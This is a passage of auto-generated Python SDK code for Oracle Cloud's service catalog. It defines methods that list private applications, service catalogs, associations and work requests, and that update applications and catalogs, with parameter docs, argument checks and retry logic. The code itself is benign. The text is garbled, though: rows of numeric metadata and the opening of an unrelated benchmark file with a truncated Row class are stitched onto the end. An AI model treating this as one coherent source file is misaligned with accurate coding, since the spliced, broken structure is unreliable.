The unique identifier for the compartment.
:param str private_application_id: (optional)
The unique identifier for the private application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param str sort_by: (optional)
The field to use to sort listed results. You can only specify one field to sort by.
Default is `TIMECREATED`.
Allowed values are: "TIMECREATED", "LIFECYCLESTATE"
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param str display_name: (optional)
Exact match name filter.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplicationCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_private_applications.py.html>`__ to see an example of how to use list_private_applications API.
"""
resource_path = "/privateApplications"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"private_application_id",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order",
"display_name"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_private_applications got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED", "LIFECYCLESTATE"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"privateApplicationId": kwargs.get("private_application_id", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"displayName": kwargs.get("display_name", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="PrivateApplicationCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="PrivateApplicationCollection")
def list_service_catalog_associations(self, **kwargs):
"""
Lists all the resource associations for a specific service catalog.
:param str service_catalog_association_id: (optional)
The unique identifier for the service catalog association.
:param str service_catalog_id: (optional)
The unique identifier for the service catalog.
:param str entity_id: (optional)
The unique identifier of the entity associated with service catalog.
:param str entity_type: (optional)
The type of the application in the service catalog.
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Default is `TIMECREATED`
Allowed values are: "TIMECREATED"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalogAssociationCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_service_catalog_associations.py.html>`__ to see an example of how to use list_service_catalog_associations API.
"""
resource_path = "/serviceCatalogAssociations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"service_catalog_association_id",
"service_catalog_id",
"entity_id",
"entity_type",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_service_catalog_associations got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"serviceCatalogAssociationId": kwargs.get("service_catalog_association_id", missing),
"serviceCatalogId": kwargs.get("service_catalog_id", missing),
"entityId": kwargs.get("entity_id", missing),
"entityType": kwargs.get("entity_type", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ServiceCatalogAssociationCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ServiceCatalogAssociationCollection")
def list_service_catalogs(self, compartment_id, **kwargs):
"""
Lists all the service catalogs in the given compartment.
:param str compartment_id: (required)
The unique identifier for the compartment.
:param str service_catalog_id: (optional)
The unique identifier for the service catalog.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param str sort_by: (optional)
Default is `TIMECREATED`
Allowed values are: "TIMECREATED"
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param str display_name: (optional)
Exact match name filter.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalogCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_service_catalogs.py.html>`__ to see an example of how to use list_service_catalogs API.
"""
resource_path = "/serviceCatalogs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"service_catalog_id",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order",
"display_name"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_service_catalogs got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"serviceCatalogId": kwargs.get("service_catalog_id", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"displayName": kwargs.get("display_name", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ServiceCatalogCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="ServiceCatalogCollection")
def list_work_request_errors(self, work_request_id, **kwargs):
"""
Return a (paginated) list of errors for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for timeAccepted is descending.
Allowed values are: "timeAccepted"
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.WorkRequestErrorCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_work_request_errors.py.html>`__ to see an example of how to use list_work_request_errors API.
"""
resource_path = "/workRequests/{workRequestId}/errors"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_by",
"sort_order"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_errors got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeAccepted"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestErrorCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestErrorCollection")
def list_work_request_logs(self, work_request_id, **kwargs):
"""
Return a (paginated) list of logs for a given work request.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for timeAccepted is descending.
Allowed values are: "timeAccepted"
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.WorkRequestLogEntryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_work_request_logs.py.html>`__ to see an example of how to use list_work_request_logs API.
"""
resource_path = "/workRequests/{workRequestId}/logs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_by",
"sort_order"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeAccepted"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestLogEntryCollection")
def list_work_requests(self, **kwargs):
"""
Lists the work requests in a compartment.
:param str compartment_id: (optional)
The unique identifier for the compartment.
:param str work_request_id: (optional)
The ID of the asynchronous work request.
:param str status: (optional)
A filter to return only resources their lifecycleState matches the given OperationStatus.
Allowed values are: "ACCEPTED", "FAILED", "SUCCEEDED"
:param str resource_id: (optional)
The ID of the resource affected by the work request
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous \"List\" call.
:param int limit: (optional)
How many records to return. Specify a value greater than zero and less than or equal to 1000. The default is 30.
:param str sort_order: (optional)
The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
The field to sort by. Only one sort order may be provided. Default order for timeAccepted is descending.
Allowed values are: "timeAccepted"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.WorkRequestSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/list_work_requests.py.html>`__ to see an example of how to use list_work_requests API.
"""
resource_path = "/workRequests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"compartment_id",
"work_request_id",
"status",
"resource_id",
"opc_request_id",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
if 'status' in kwargs:
status_allowed_values = ["ACCEPTED", "FAILED", "SUCCEEDED"]
if kwargs['status'] not in status_allowed_values:
raise ValueError(
"Invalid value for `status`, must be one of {0}".format(status_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["timeAccepted"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": kwargs.get("compartment_id", missing),
"workRequestId": kwargs.get("work_request_id", missing),
"status": kwargs.get("status", missing),
"resourceId": kwargs.get("resource_id", missing),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="WorkRequestSummaryCollection")
def update_private_application(self, private_application_id, update_private_application_details, **kwargs):
"""
Updates the details of an existing private application.
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
The details for updating the private application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/update_private_application.py.html>`__ to see an example of how to use update_private_application API.
"""
resource_path = "/privateApplications/{privateApplicationId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_private_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"privateApplicationId": private_application_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_private_application_details,
response_type="PrivateApplication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_private_application_details,
response_type="PrivateApplication")
def update_service_catalog(self, service_catalog_id, update_service_catalog_details, **kwargs):
"""
Updates the details of a previously created service catalog.
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
Details to update for a service catalog.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalog`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/update_service_catalog.py.html>`__ to see an example of how to use update_service_catalog API.
"""
resource_path = "/serviceCatalogs/{serviceCatalogId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_service_catalog got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"serviceCatalogId": service_catalog_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_service_catalog_details,
response_type="ServiceCatalog")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_service_catalog_details,
response_type="ServiceCatalog")
| 49.432099
| 268
| 0.653354
| 16,264
| 132,132
| 5.116884
| 0.032218
| 0.066233
| 0.018841
| 0.00572
| 0.911116
| 0.895615
| 0.87842
| 0.868783
| 0.863628
| 0.854904
| 0
| 0.001281
| 0.267278
| 132,132
| 2,672
| 269
| 49.450599
| 0.858298
| 0.407259
| 0
| 0.820619
| 0
| 0
| 0.159237
| 0.03652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018557
| false
| 0.000687
| 0.006186
| 0
| 0.061168
| 0.000687
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3dbd0f548c183e0fa94fb303f2bcba72893a33a1
| 8,984
|
py
|
Python
|
spark/python/benchmark_SPARK_9488.py
|
0x0FFF/experiments
|
c9533c6ad6141a48303a43947d89f2322aeed70d
|
[
"Apache-2.0"
] | null | null | null |
spark/python/benchmark_SPARK_9488.py
|
0x0FFF/experiments
|
c9533c6ad6141a48303a43947d89f2322aeed70d
|
[
"Apache-2.0"
] | null | null | null |
spark/python/benchmark_SPARK_9488.py
|
0x0FFF/experiments
|
c9533c6ad6141a48303a43947d89f2322aeed70d
|
[
"Apache-2.0"
] | null | null | null |
import random
import time
from hashlib import md5
def _create_row(fields, values):
row = Row(*values)
row.__fields__ = fields
return row
class Row(tuple):
"""
